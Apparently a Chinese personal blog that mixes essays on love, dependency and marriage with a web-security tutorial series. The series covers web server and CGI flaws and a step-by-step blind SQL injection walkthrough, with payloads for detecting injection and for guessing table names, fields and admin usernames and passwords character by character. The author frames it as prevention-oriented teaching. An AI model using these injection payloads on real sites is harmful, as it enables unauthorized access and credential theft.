泡泡的海洋

堕落了好久，开始更新！

2011-03-07T20:39:54+08:00

把工作中的一些感悟如实记录下来，让后来人可以少走一些弯路！

莫把依赖当做爱

2010-02-27T00:05:00+08:00

     随着两个人在一起生活的时间变长，依赖性逐渐增加。可以说，依赖性是爱的另一个误区。这种情况在因感情失意而极度沮丧的人身上出现的最为频繁，他们无法忍受孤独，甚至产生轻生之念或以自杀威胁。他们会痛苦的认为“如果我没有了妻子（丈夫、男朋友、女朋友），那活着还有什么乐趣的，我是那么的爱他（她）”。但是这并不是真正的爱，只是过分的依赖感。就像一个寄生者，对方是你的寄主，你们结合的原因并不是因为爱，而是因为相互需要，离开了对方，你会感觉好像就无法生存，但是一旦有了新的感情依赖，可能会对原来的寄主弃之如敝屣。我们时常听说和见到有些人经常在感情受到极大打击之后迅速投入另外一段感情，或者某个人毫不留情的就抛妻弃子（或者抛弃老公和孩子）。如果因为没有别人的关心和照顾，就认为人生不完整，以致无法正常生活，这就成了一种病态，如果再把这种病态的依赖当做爱就可能会造成悲剧。君不见某某人因为失恋将其原来的恋人残酷的杀死之后自杀的惨剧时常见诸报端。
     人人都有依赖的需求和渴望，都希望有更加强大、更有力的人关心自己。不管我们看起来多么强壮，也不管我们花多大心思，竭力做出无需关心的样子，但是在我们内心深处，都渴望过依赖于别人的感觉。不管年龄大小，不管是否成熟，我们都希望拥有一个给我们安全温暖感的人。我们应该承认这种感觉的合理性，但不能让它控制你的生活。如果它牢牢地控制着我们的一言一行，控制着我们的一切感受和需要，那么它就不在是单纯的渴望，而是一种病态的渴望。
     把依赖看做爱的人们，很容易不在乎依赖的对象是谁，只要有人可以依赖，就心满意足。只要通过与别人的关系，让他们获得某种身份和角色，他们就会感到满足，至于那是什么身份，对他们并不重要。他们的情感关系，貌似热烈，实则脆弱，因为他们构建感情的目的，只是为了填补内心的空虚，甚至达到来者不拒的地步。但是他们只是酷似如何获取他人的爱，只在乎别人能为他们做什么，却从不考虑自己给为对方付出多少，甚至没有精力去爱对方。如同饥肠辘辘者只想着向别人讨厌食物，却不能拿出食物帮助别人。他们寂寞和孤独，永远无法体验到满足感。他们从不考虑他人需要，即使感情关系行将破裂，仍然我行我素，不肯做出自我检讨和改变，他们不想改变自己，宁愿牺牲最近亲的人的感受。经常看到一些嗜酒如命的人，明明知道把酒戒掉酒可以过上幸福的生活，妻子孩子都会在他身边，但他就是无法改变自己的行为。
这是因为他们没有认识到，想要别人真正爱你，那么自己就必须要成为值得爱的人。满脑子只想着消极接受别人的爱，就不可能成为值得爱的人。他们这样子做并不会永远自私自利，但其动机无非是想牢牢地抓住莫个人，获得需要的关心和照顾。假如无法达到目的，他们就不会为别人（乃至自己）做任何事情。
     同样，依赖性过强的人，会把失去伴侣看做极其恐怖的事情，他们丝毫不肯降低对他人的依赖性，不肯给予对方更多的自由。以过分的依赖的心态为起点，会导致婚姻变成可怕的陷阱。所谓的爱，只是过分的依赖，而自由和独立并不存在。有些依赖性过强的夫妻给人的感觉是恩爱异常，不论什么时候两人都如胶似漆，而且这样子的婚姻可能维持相对长的时间，而且夫妻双方对于婚姻现状感觉满意，不会产生过多的危机感，但这样子的婚姻并不健全，其中未必有真正的爱。以牺牲自由获取安全感，必将付出高昂的代价。
     倘若情感出现问题，他们就会归咎他人，他们每每生活在失望无沮丧当中，总会认为是别人没有尽心尽力。他们容易忘记别人的好处，单单想到其缺点和不足，并此感到其消沉，产生怨恨。把别人当做快乐之源，将来一定备受打击。他们有某种“容易上瘾的性格”，他们只对别人上瘾，从别人身上汲取需要的一切，而且永不满足，要是遭到别人拒绝，或无法获得好处，他们马上就会转向杯中物或者注射器，将他们作为情感和精神的替代品，将酒吧之类的场所当做他们的精神乐园。更有甚者还会向伴侣造成更大的伤害，甚至是伤害到了伴侣的生命。此类事情经常在报端出现。
      过于强烈的依赖性，可能使我们强烈的亲近莫个人，便面上我们与对方彼此相爱，实际上，依赖与爱之间有着天壤之别。把这个依赖感当做爱会给人际关系造成破坏，也会使卷入其中的人跟着遭殃。

婚姻是爱情的坟墓么？

2010-02-25T23:21:55+08:00

       这个时候我们面临着艰难的抉择，但如果意识不到我们错把初恋时的感觉当成永恒的爱的事实，意识不到这是一种错误，是一种误会，走不出浪漫爱情神话这个谎言，不能面对现实，那么我们就有可能把希望寄托给第三者身上，而不是彼此滋养，增进感情，到头来只会是鸡飞蛋打，如果一直这样子下去，最终都会后悔不迭，一辈子痛苦。
     同样在这个时候我们有的人会选择婚姻，那婚姻是爱情的坟墓么？
与爱情的开始不是出于主观意愿，不是有计划、有意识的选择相比，婚姻的开始更多的是有计划、有意识的选择，不管你是被动或主动地接受。有时候，婚姻看起来是恋爱的延续，男男女女从恋爱结婚，自然而然，水到渠成。与此同时，你可能因为家庭、钱财、社会影响等等诸多原因娶一个你根本不爱的人，或者因为权利、利益等等原因嫁给一个你即不爱也不可能爱的人。比如一个妙龄美女嫁给了一个行将就木的老人。这样我们看来婚姻的开始与爱情并不存在必然的因果，也没有直接的关联。但由于常规的婚姻都是在男女恋爱之后的选择，所以人们也往往认为婚姻是爱情的升华，但更多的时候男女在婚后才开始面对真正的现实生活，问题冲突会越来越明显，越来越远超出我们对爱情的认识，恋爱的感觉也随之越来越少，于是乎很多人错把婚姻当做是爱情的坟墓，因为我们没有意识到，即使没有婚姻，现实同样如此，而婚姻便成为了我们错误认识的替罪羔羊。
     真正的婚姻只是对男和女结合在一起共同生活的一种社会现象的表述。这是一种群居高等生命的本能属性，自然法则会用异性相吸的力量，使哺乳类生命繁衍生息。人类的婚姻存在形式以及结合方式，受人类社会环境的影响。不同时代和地区的社会环境，造就了多样的婚姻模式，以及结合方式。科学的意义上看，如果没有婚姻，很多血统就会出现混乱，不利于人们的优良繁衍。而婚姻主要的特征如下：
婚姻以男女两性结合为基础。男女两性的生理差别、人类固有的性本能，是婚姻赖以形成的自然因素，也是婚姻固有的自然属性，这种自然属性是婚姻关系区别于其他社会关系的重要特征，如果没有上述种种自然因素，人类社会根本就不可能出现婚姻。
婚姻以共同生活为目的，强调结为婚姻的男女双方必须“共同生活”。这既是婚姻对当事人主观心理状态的要求，也是一直为人们所追求的婚姻在理想层次的含义。
　　所谓“共同生活”，是指居住在一起，成为同一个家庭的成员，处在同一个生活消费共同体中。一般情况下，还包括夫妻之间的性生活和夫妻间的互敬互爱。 “共同生活”一般为“精神的生活共同（互相亲爱、精神的结合）、性的生活共同（肉的结合）及经济的生活共同（家计共有），”这是对“共同生活”全部内容的概括。
     婚姻具有夫妻身份的公示性是婚姻的现象层次上的含义。它要求婚姻双方应具有公开的夫妻身份，男女双方必须以夫妻名义同居生活，周围群众也认为他们是夫妻。　　
     如果错把婚姻当成真正永恒的爱，那么随着冲突和矛盾发生，我们更加会认为伴侣不是上天给我们安排的人，爱的感觉消失殆尽，痛苦和后悔开始产生，于是乎很多人开始认为真爱远去，再也不能体会到爱的感觉，夫妻双方开始得过且过，貌合神离，更有甚者开始寻求婚外激情，以至于最终劳燕分飞。

你真的爱她么

2010-02-22T20:43:50+08:00

你真的爱她么？

      你真的爱她么？
    每个人都会面对这个问题，但是大部分的爱情失败的原因都是没有真正的理解这个问题所代表的含义，可以说，只有你发自内心的去思考这个问题，并用行动去证明这个问题，你才会慢慢的发现什么是爱情。
    你爱我么？相信每个人都回答过爱人这样子的问题。我也相信在一起的两个人都会回答，我爱你。但是真的是这样么？
    在刚刚开始恋爱时候，我们会毫不犹豫的回答，我爱她。
    然而现实很残酷，两人的相处时间越长，日常琐事越来越多，烦心事接踵而来，矛盾也会逐渐显露。我们很痛苦的意识到，两个人之间有了太多的不同点，欲望，想法，爱好等等等等，然而更痛苦的发现，这些问题好像难以改变。这个时候我们或许会变得越来越烦躁，对方的缺点越来越多，随之就会抱怨，我怎么会跟这种人在一起呢？她是不是真的爱我？她值不值得我去爱？结果可能越来越坏，两个人可能最终会走向分手。
    这种事情几乎每个人都会遇到。
    我们认识中的爱情是从哪里来的呢？首先我们对任何事物的认识都来源于我们的感觉器官对外界的接受，不管是我们看到的，还是听到的，都归属于客观的认识。从古至今，多少故事描述了浪漫的爱情，梁山泊祝英台，杨过小龙女，王子与公主这些爱情故事也成为了我们自己爱情的范本，被我们放在崇高的位置，被我们顶礼膜拜。同时，我们在生活中亲身接触到得一些事情同样影响着我们对爱情的认识。
    其次我们还有很多的对事物的认识来源于自身的思考，即来自于主观的认识，在脑海中关于爱情的种种经常会在我们脑中出现。当来自客观的认识和自己的心中的幻想相结合之后，白马王子和梦中情人就产生了。
    这样子的想法促使我们相信，在这个世界上，存在着唯一属于他的恋人。我们认为这是上天注定的，除了对方，我们再也找不到更合适的伴侣，因此一旦相逢，就会爱的死去活来。既然我们的相遇时天作之合，那么我们就会永远的满足对方的需求，永远幸福的生活在一起。数不清的人陶醉于这种浪漫的爱情氛围中，期待着梦中情人和白马王子的出现，只期待这样的爱情，到头来发现只是生活在自欺欺人的假象当中，现实生活和浪漫爱情相去甚远，差的不止十万八千里。在和伴侣发生了冲突和摩擦后，爱情的火花慢慢退去，这时我们就会认为我们可能违背了上天的旨意，这个人并不是冥冥注定要在一起的人，也许错过了最适合我们的人。
     爱情的开始不是出于主观意愿，不是有计划、有意识的选择。不管你怎么期待，没有机遇和缘分，爱情也不会来到你身边，就永远无法体会到恋爱的感觉。有时候，它却有可能成为不速之客，不请自来。有时候，你会爱上一个人，你不去计较他的出身，他与你的差距，甚至于他身上让你无法忍受的缺点，你就是爱他，毫无理智的爱！与此同时，也许另一个人各方面都很出色，值得你全心全意的去爱，可你始终不能对他产生爱情。成年人有时会以理性和原则作为约束，来控制自己不顾一切的狂热行人。不管怎么说，控制爱情会让我们忍受难以想象的痛苦。另外，不管自我约束如何严格，我们也只能控制恋爱过程，却无法创造出恋爱的感觉，恋爱的激情到来的时候，你可以凭借愿望和意志力做出反应，却不能凭借他们创造恋爱的体验。人在初识爱情的时候，恋爱带来的甜蜜和幸福感往往最为突出，随着阅历和生活经验的增加，恋爱的感觉越来越平淡，甚至不再出现。这就是初恋为什么总是那么让人难以忘怀？
     当刚开始恋爱的时候，我们往往认为找到了心中的另一半，也认为找到了真爱。这个时候我们眼中互相只有对方，认为对方是我们的全部，这个时候我们理想中的白马王子和梦中情人和现实中的恋人基本重合，在我们的眼中，对方近乎完美，虽然有缺点，有毛病，哪有算得了什么呢，有时候只会提升恋人的价值，增加对方在我们眼中的魅力。比如热恋的一方认为男朋友吸烟是一个比较有男人味的表现，用拳头解决问题是雄性的象征。
    不管我们是否认同，男女恋爱的开始通常与性和欲望相关。不管你是如何的爱自己的孩子和亲人，那么你也不会和其进行恋爱，同样也不会和同性进行恋爱（乱伦和同性恋除外）。性冲动才是促使你开始恋爱主要因素，这或许是由人类的基因所决定的，是生物交配的本能，意义在于增加人类的生殖机会，促进物种繁衍和生存。人的本能战胜了理性，使我们心甘情愿的落入婚姻的“陷阱”（不管你情不情愿，幸福不幸福）。如果没有这种本能驱动，不知道有多少人在步入婚姻殿堂之前，就会想到婚后要面对的现实，而感到张皇失措，只想落荒而逃。
    再者，恋爱带来的甜蜜和幸福感都是短暂的，不管恋爱的对象是谁，感情慢慢就会逐渐趋于平静。但是这并不意味着我们将不再爱对方，因为不管是多么令人头晕目眩的爱情，总归有一天会消失，就如同美好的蜜月，迟早会过去，鲜艳的花朵，势必要枯萎凋零，没有东西能够永恒。当激情退去，感情趋于平淡的时候，恋人身上那梦中情人和白马王子般的光环退去，我们看到了真实的对方，对方的毛病和缺点逐渐显现。于是乎失望，沮丧等等情绪接踵而至，恋爱的感觉消失殆尽，你感受到得只是失落和幻灭。
    这个时候我们面临着艰难的抉择，有人选择婚姻，试图延续这种感觉，有人选择分道扬镳，重新寻找上天注定的那个人。但如果意识不到我们错把初恋时的感觉当成永恒的爱的事实，意识不到这是一种错误，是一种误会，那么我们最终都会后悔不迭，一辈子痛苦。

前言

2010-02-22T20:42:07+08:00

       这是一本普通的书，它如实的记录了我在生活中对爱情的思考。
在和老婆交往的过程中，经常思考爱情是什么，经过不断的思考和两人的磨合，我们两人之间的感情越来越好，感觉两人的心灵得到了相通。
       本书不是一本时髦的书，甚至还会让你感觉到一点点的不舒服，不过，请不要回避，因为我相信我的这些思考给够给你带来一点启示，虽然我也不清楚我对爱情的定义是否准确，但是希望我的一些思考能够给同样寻找真正爱情的人一点启发。
       关于爱情的故事随处可见，美好的爱情也成了人们心中最期待的东西。然而在当今社会，爱情离人越来越远，谁能说清楚呢？
      如果你真的是一个渴望爱情的人，是一个希望用一生追寻爱情的人，那么，请你坚持的看完这本书吧。当年认真的看完这本书，并用心的体会它，那么美好的爱情将会离你越来越近。

重新开始更新---重要知会

2010-02-09T22:23:04+08:00

蛰伏了很久，又开始更新了！

因为工作原因，现在不在专职做web安全了，也是因为工作原因，忙得头晕眼花的，好长时间都没有上来更新了！

本站郑重声明，我在这里只做原理性的分析，告诉大家web漏洞形成原因，以及检测方法，目的是让大家能够预防web攻击！

Web 安全系列文章--web安全漏洞概述

2009-08-30T00:00:42+08:00

Web 安全系列文章--web安全漏洞概述

写了好久发现没有一个总的纲要，现在补上，后续本文将针对web安全的各种漏洞进行技术分析。

Web的大多数安全问题都属于下面三种类型之一：

1、服务器向公众提供了不应该提供的服务。

2、服务器把本应私有的数据放到了公开访问的区域。

3、服务器信赖了来自不可信赖数据源的数据。

显然，许多服务器管理员从来没有从另一个角度来看看他们的服务器，例如使用端口扫描程序。如果他们曾经这样做了，就不会在自己的系统上运行那么多的服务，而这些服务原本无需在正式提供Web服务的机器上运行，或者这些服务原本无需面向公众开放。

与这种错误经常相伴的是，为了进行维护而运行某些不安全的、可用于窃取信息的协议。例如，有些Web服务器常常为了收集订单而提供POP3服务，或者为了上载新的页面内容而提供FTP服务甚至数据库服务。在某些地方这些协议可能提供安全认证(比如APOP)甚至安全传输(比如POP或者FTP的SSL版本)，但更多的时候，人们使用的是这些协议的非安全版本。有些协议，比如Msql数据库服务，则几乎没有提供任何验证机制。

从公司外面访问自己的网络，完整地检测、模拟攻击自己的网站看看会发生些什么，这对于Web管理者来说是一个很好的建议。有些服务在机器安装之后的默认配置中已经启动，或者由于安装以及初始设置的需要而启动了某些服务，这些服务可能还没有正确地关闭。例如，有些系统提供的Web服务器会在非标准的端口上提供编程示范以及系统手册，它们往往包含错误的程序代码并成为安全隐患所在。正式运行的、可从Internet访问的Web服务器不应该运行这些服务，请务必关闭这些服务。

9.1Web服务器常见漏洞介绍

我们的目的就是向大家介绍Web服务器的常见漏洞，相信看了自己也能试着发现一些Web服务器的漏洞了。不过需要记住的是，不要为了寻找漏洞而寻找漏洞。另外，即使你找到了漏洞，是否能够利用还是另外一回事。

Web服务器存在的主要漏洞包括物理路径泄露，CGI源代码泄露，目录遍历，执行任意命令，缓冲区溢出，拒绝服务，条件竞争和跨站脚本执行漏洞，和CGI漏洞有些相似的地方，但是更多的地方还是有着本质的不同。不过无论是什么漏洞，都体现着安全是一个整体的真理，考虑Web服务器的安全性，必须要考虑到与之相配合的操作系统。

9.1.1物理路径泄露

物理路径泄露一般是由于Web服务器处理用户请求出错导致的，如通过提交一个超长的请求，或者是某个精心构造的特殊请求，亦或是请求一个Web服务器上不存在的文件。这些请求都有一个共同特点，那就是被请求的文件肯定属于CGI脚本，而不是静态HTML页面。

还有一种情况，就是Web服务器的某些显示环境变量的程序错误的输出了Web服务器的物理路径，这应该算是设计上的问题。

9.1.2目录遍历

目录遍历对于Web服务器来说并不多见，通过对任意目录附加“../”，或者是在有特殊意义的目录附加“../”，或者是附加“../”的一些变形，如“..\”或“..//”甚至其编码，都可能导致目录遍历。前一种情况并不多见，但是后面的几种情况就常见得多，去年非常流行的IIS二次解码漏洞和Unicode解码漏洞都可以看作是变形后的编码。

9.1.3执行任意命令

执行任意命令即执行任意操作系统命令，主要包括两种情况。一是通过遍历目录，如前面提到的二次解码和UNICODE解码漏洞，来执行系统命令。另外一种就是Web服务器把用户提交的请求作为SSI指令解析，因此导致执行任意命令。

9.1.4缓冲区溢出

缓冲区溢出漏洞想必大家都很熟悉，无非是Web服务器没有对用户提交的超长请求没有进行合适的处理，这种请求可能包括超长URL，超长HTTPHeader域，或者是其它超长的数据。这种漏洞可能导致执行任意命令或者是拒绝服务，这一般取决于构造的数据。

9.1.5拒绝服务

拒绝服务产生的原因多种多样，主要包括超长URL，特殊目录，超长HTTPHeader域，畸形HTTPHeader域或者是DOS设备文件等。由于Web服务器在处理这些特殊请求时不知所措或者是处理方式不当，因此出错终止或挂起。

9.1.6条件竞争

这里的条件竞争主要针对一些管理服务器而言，这类服务器一般是以System或Root身份运行的。当它们需要使用一些临时文件，而在对这些文件进行写操作之前，却没有对文件的属性进行检查，一般可能导致重要系统文件被重写，甚至获得系统控制权。

9.2CGI的安全性

现在我们来谈谈到底什么是CGI(CommonGateIntergace)。在物理上，CGI是一段程序，它运行在Server上，提供同客户段Html页面的接口。这样说大概还不好理解。那么我们看一个实际例子：现在的个人主页上大部分都有一个留言本。留言本的工作是这样的：先由用户在客户段输入一些信息，如名字之类的东西。接着用户按一下“留言”(到目前为止工作都在客户端)，浏览器把这些信息传送到服务器的CGI目录下特定的CGI程序中，于是CGI程序在服务器上按照预定的方法进行处理。在本例中就是把用户提交的信息存入指定的文件中。然后CGI程序给客户端发送一个信息，表示请求的任务已经结束。此时用户在浏览器里将看到“留言结束”的字样。整个过程结束。

CGI是一种共用网关接口，它可以称之为一种机制.因此您可以使用不同的程序编写适合的CGI程序，这些程序语言包括VisualBasic、Delphi或C/C++等，您将已经写好的程序放在Web服务器的计算机上运行，再将其运行结果通过Web服务器传输到客户端的浏览器上。事实上，这样的编制方式比较困难而且效率低下，因为你每一次修改程序都必须重新将CGI程序编译成可执行文件。

9.2.1为什么使用CGI

CGI可以为我们提供许多HTML无法做到的功能，比如：

1、一个记数器

2、顾客信息表格的提交以及统计

3、搜索程序

4、Web数据库

用HTML是没有办法记住客户的任何信息的，就算用户愿意让你知道。用HTML也是无法把信息记录到某一个特定文件里的。要把客户段的信息记录在服务器的硬盘上，就要用到CGI。这是CGI最重要的作用，它补充了HTML的不足。是的，仅仅是补充，不是替代。

9.2.2CGI安全问题

在计算机领域——尤其在Internet上——尽管大部分Web服务器所编的程序都尽可能保护自己的内容不受侵害，但只要CGI脚本中有一点安全方面的失误——口令文件、私有数据、以及任何东西，就能使入侵者能访问计算机。遵循一些简单的规则并保持警惕能使自己的CGI脚本免受侵害，从而可以保护自己的权益。这里所说的CGI安全，主要包括两个方面，一是Web服务器的安全，一是CGI语言的安全

先从CGI问题的分类开始谈起，一般来说，CGI问题主要有以下几类：

1、暴露敏感或不敏感信息；

2、缺省提供的某些正常服务未关闭；

3、利用某些服务漏洞执行命令；

4、应用程序存在远程溢出；

5、非通用CGI程序的编程漏洞。

下面我们就来详细介绍一下关于CGI的漏洞：

●配置错误

这里所说的配置错误主要指CGI程序和数据文件的权限设置不当，这可能导致CGI源代码或敏感信息泄露。还有一个经常犯的错误就是安装完CGI程序后没有删除安装脚本，这样攻击者就可能远程重置数据。前些日子“XX大联盟”论坛多次被黑就是这个低级错误所致。

●边界条件错误

这个错误主要针对C语言编写的CGI，利用这个错误，攻击者可能发起缓冲区溢出攻击，从而提升权限。

●访问验证错误

这个问题主要是因为用于验证的条件不足以确定用户的身份而造成的，经常会导致未经授权访问，修改甚至删除没有访问权限的内容。用于确定用户身份的方法一般有两种，一是账号和密码，一是Session认证。而不安全的认证方法包括Userid认证，Cookie认证等等。

●来源验证错误

比较常见的利用这种错误进行攻击的方法就是DoS，也就是拒绝服务攻击，如我们知道的灌水机，就是利用CGI程序没有对文章的来源进行验证，从而不间断的发文章，最后导致服务器硬盘充满而挂起。

●输入验证错误

这种错误导致的安全问题最多，主要是因为没有过滤特殊字符。比如说，没有过滤“%20”造成的畸形注册，没有过滤“../”经常造成泄露系统文件，没有过滤“$”经常导致泄露网页中的敏感信息，没有过滤“;”经常导致执行任意系统指令，没有过滤“|”或“\t”经常导致文本文件攻击，没有过滤“’”和“#”经常导致SQL数据库攻击，没有过滤“<”和“>”导致的Cross-SiteScripting攻击等。

●意外情况处理失败

这种错误也很常见，如没有检查文件是否存在就直接打开设备文件导致拒绝服务，没有检查文件是否存在就打开文件提取内容进行比较而绕过验证，上下文攻击导致执行任意代码等。

●策略错误

这种错误主要是由于编制CGI程序的程序员的决策造成的。如原始密码生成机制脆弱导致穷举密码导致在Cookie中明文存放账号密码导致敏感信息泄露，使用与CGI程序不同的扩展名扩展名存储敏感信息导致该文件被直接下载，丢失密码模块在确认用户身份之后直接让用户修改密码而不是把密码发到用户的注册信箱，登陆时采用账号和加密后的密码进行认证导致攻击者不需要知道用户的原始密码就能够登陆等。

●习惯问题

程序员的习惯也可能导致安全问题，如使用某些文本编辑器修改CGI程序时，经常会生成“.bak”文件，如果程序员编辑完后没有删除这些备份文件，则可能导致CGI源代码泄露。另外，如果程序员总喜欢把一些敏感信息(如账号密码)放在CGI文件中的话，只要攻击者对该CGI文件有读权限(或者利用前面介绍的一些攻击方法)就可能导致敏感信息泄露。

●使用错误

主要是一些函数的使用错误，如Perl中的“die”函数，如果没有在错误信息后面加上“\n”的话，就极可能导致物理路径泄露。

Web 安全系列文章--SQL注入阶段总结篇

2009-08-29T23:55:19+08:00

Web 安全系列文章--SQL注入--SQL注入阶段总结篇

   到此为止我们已经把SQL注入的原理，检测方法和具体的注入方法进行的详细的讲解，具体的操作就要看大家的努力了。

    ＳＱＬ注入漏洞可谓是“千里之堤，溃于蚁穴”，这种漏洞在网上极为普遍，通常是由于程序员对注入不了解，或者程序过滤不严格，或者某个参数忘记检查导致。

   我们知道大部分的网站都会使用数据库，而且数据库的使用和站点的语言都有一定的规律，比如asp的站点一般使用access之类的，php，jsp的站点一般使用mysql数据库，当然Oracle数据读，db2，SQL server等大型数据库使用的范围就更多了！

  一些大型的数据库为了操作方便和加快开发进度，提供了一些对于开发非常有用的功能，比如SQL Server中的扩展命令，比如默认的数据库中存在的一些数据库，那么此类的东东对于熟悉数据库的黑客来说那就是强大的利器了，一旦有SQL漏洞存在，那么功能越强大就越危险。

  后续有时间将会针对每种数据库的注入进行详细的讲解。如果要学习的话，需要大量的数据库的知识。
我的时间和精力也是有限，将根据时间的安排和自己的计划进行后续的讲解。

  下期将开始新的漏洞讲解。XSS漏洞原理。

Web 安全系列文章--SQL注入内容猜解

2009-08-29T23:34:39+08:00

Web 安全系列文章--SQL注入内容猜解

    接上文，讲述了如何检测web上面的SQL注入漏洞，那么本篇将继续讲解如果通过此漏洞获取一些我们想要的信息。
   那么找到一个漏洞之后如何进一步进行注入呢？具体步骤如下。

   1、猜解表名

要猜表名的话，首先要熟悉程序员在设计数据库时的习惯，对于一般的程序员来说，可能会采用admin、user啊之类的方式来对用户信息进行命名，那么在猜解的时候就可以使用下面的语句进行表名猜解。
比如：www.test.asp?user=10;
对于此类的网站可以使用www.test.asp?user=10 and 0<(select count(*) from 表名)
使用前面所说的admin之类的准备的表明替换表名，构成语句
www.test.asp?user=10 and 0<(select count(*) from admin)
如果返回正确，说明次select语句执行成功，那么就说明该表存在。根据例子我们发现了admin表存在。

    2、猜解表中内容个数
同样适用语句：
www.test.asp?user=10 and 内容个数<(select count(*) from admin)
从1开始一次替换内容个数，构造诸如一下的语句：
www.test.asp?user=10 and 1<(select count(*) from admin)
www.test.asp?user=10 and 2<(select count(*) from admin)
......
www.test.asp?user=10 and n<(select count(*) from admin)

直到次语句失败为止。那么在那个地方失败就说明此表的内容条数是n-1.到此我们发现了admin表中存在n-1条记录。

   3、猜解字段名
对字段明的猜解同样是根据程序员的习惯进行猜解，我们一般可以想象的到，程序员习惯使用user，password进行字段名的定义，那么我们就可以根据这类的定义使用诸如此类的语句进行字段猜解。

1=(select count(*) from admin where len(用户字段名称name)>0)

那么假设，用户的表段中含有user和password字段，那么此语句将执行成功；

www.test.asp?user=10 and 1=(select count(*) from admin where len(user)>0)
www.test.asp?user=10 and 1=(select count(*) from admin where len(password)>0)

那么我们通过这种猜测方式就可以猜到admin表中存在user和password两个字段。

是不是感觉离成功又进了一步呢？继续往下看！

   4、猜解字段长度
在猜解字段内容之前要先去猜解字段长度。判断出长度之后那么我们对内容的猜解将会更加顺利。
使用下面的语句进行猜解
1=(select count(*) from admin where len(用户字段名称name)>字段长度)

如此使用1--n对字段长度进行替换
www.test.asp?user=10 and 1=(select count(*) from admin where len(password)>1)
......
www.test.asp?user=10 and 1=(select count(*) from admin where len(password)>n)

直到
www.test.asp?user=10 and 1=(select count(*) from admin where len(password)>n-1)成功
www.test.asp?user=10 and 1=(select count(*) from admin where len(password)>n)失败
那么这说明password的长度是n-1。

   5、猜解内容
我们知道了表名之后是不是迫切想知道该表中有什么内容呢？
使用下面的方法进行进一步的尝试，将可以获取得到表中的内容。

1=(select count(*) from admin where left(字段名字,1)=ascii字符)

www.test.asp?user=10 1=(select count(*) from admin where left(user,1)=a)
如果发现此语句执行成功，那么我们可以断定admin表中的user中的一条记录中的第一个字符是a
继续使用语句
www.test.asp?user=10 1=(select count(*) from admin where left(user,2)=ad)
www.test.asp?user=10 1=(select count(*) from admin where left(user,3)=adm)
www.test.asp?user=10 1=(select count(*) from admin where left(user,4)=admi)
www.test.asp?user=10 1=(select count(*) from admin where left(user,5)=admin)

如此继续，知道猜到上次获取的字段长度为止，那么我们就可以获取到admin表中的user字段中含有admin这个用户。
到这里我们是不是已经才出了此网站的用户名呢？

当然，使用同样的方式就可以才出用户的密码。

到此我们已经猜出了此网站的用户名和密码，那么我们是不是已经攻破了这个网站呢。

当然在注入的过程中可能会遇到一些内容，但是整体的注入的原理基本上到这里都讲完了。后续将继续SQL注入进行一些高级的讲解。

Web 安全系列文章--SQL注入判断

2009-08-28T20:13:47+08:00

Web 安全系列文章--SQL注入判断

    上文介绍了SQL注入的原理，我们知道SQL注入其实是注入的一种，那么针对SQL注入，我们应该怎么样子去检测呢，怎么样子才能知道一个页面是否存在注入呢？本文将详细讲解注入的判断方法。

   首先从最经典1=1 和1=2开始。
   假设有以下一个页面：http://www.mytest.com/showdetail.asp?id=49
那么我们按照下面的3步进行测试:
① http://www.mytest.com/showdetail.asp?id=49

  ② http://www.mytest.com/showdetail.asp?id=49 and 1=1

  ③ http://www.mytest.com/showdetail.asp?id=49 and 1=2

  这就是经典的1=1、1=2测试法了，怎么判断呢？看看上面三个网址返回的结果就知道了：

  可以注入的表现：

  ① 正常显示（这是必然的，不然就是程序有错误了）

  ② 正常显示，内容基本与①相同

  ③ 提示BOF或EOF（程序没做任何判断时）、或提示找不到记录（判断了rs.eof时）、或显示内容为空（程序加了on error resume next）

  为什么呢？SQL注入的本质是程序没有对用户的输入进行判断，导致了用户在提交数据的时候可以吧构造的特殊的数据带入了数据库中进行处理，从而导致了某些黑客通过构造一些特殊的SQL进行恶意的操作。

  上面是基本的整数型的注入，当然对于其它类型的数据类型来说，使用同样的方法进行判断即可，下面是其他类型的注入检测方法。

  对于字符型的注入检测语句：1'='1' 和 1'='2'

   上述2类的注入的SQL原理代码在上节文章中已经有详细讲解，就不在详细介绍了。

  对于搜索型的注入检测语句：%'and 1=1 and '%'=' 和 %'and 1=2 and '%'='
   可能有部分人不知道搜索型注入是怎么回事，我们来这样分析。
   我们知道一般搜索代码是这么写的：

  Select * from 表名 where 字段 like ’%关键字%’
  这样就造成了对关键字前后的所有匹配(%是用来全部匹配的)
   这里如果关键字没有过滤的话，就可以这样来构造：
  关键字=’ and [查询条件] and ‘%25’=’
  这样查询就变成
  select * from 表名 where 字段 like '%' and 1=1 and '%'='%'
   那么这就是搜索型的SQL注入。

  基本上上面所讲就是SQL注入的所有的判断方法了。但是这只是最基本的原理。要想能够进一步的使用SQL注入，那么请看下篇文章。